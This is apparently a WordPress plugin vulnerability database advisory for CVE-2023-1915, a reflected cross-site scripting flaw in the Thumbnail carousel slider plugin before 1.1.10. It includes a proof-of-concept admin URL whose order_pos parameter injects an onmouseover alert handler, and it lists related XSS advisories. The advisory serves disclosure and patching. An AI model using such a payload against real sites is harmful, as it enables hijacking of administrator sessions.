Thumbnail carousel slider < 1.1.10 – Reflected XSS | CVE 2023-1915 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting vulnerability which could be used against high privilege users such as admin.

Proof of Concept

Make a logged in admin open: GET /wp-admin/admin.php?page=responsive_thumbnail_slider_image_management&order_by=title&order_pos=uqxt1%22%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20cxz0m
 
Affected parameters: order_by, order_pos, and search_term

Affects Plugins

wp-responsive-thumbnail-slider

Fixed in 1.1.10

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Chien Vuong

Submitter

Chien Vuong

Verified

Yes

WPVDB ID

0487c3f6-1a3c-4089-a614-15138f52f69b

Timeline

Publicly Published

2023-04-18 (about 1 years ago)

Added

2023-04-18 (about 1 years ago)

Last Updated

2023-04-18 (about 1 years ago)

Other

Published

Title

Published

2024-04-22

Title

Image Slider < 1.1.127 - Authenticated (Editor+) Stored Cross-Site Scripting

Published

2023-12-25

Title

Estatik Real Estate Plugin < 4.1.1 - Reflected XSS

Published

2023-12-27

Title

My Agile Privacy < 2.1.8 - Authenticated (Contributor+) Stored Cross-Site Scripting vis Shortcode

Published

2017-01-17

Title

WangGuard <= 1.7.2 - Authenticated Reflected Cross-Site Scripting (XSS)

Published

2021-09-06

Title

Better Find and Replace < 1.2.9 - Reflected Cross-Site Scripting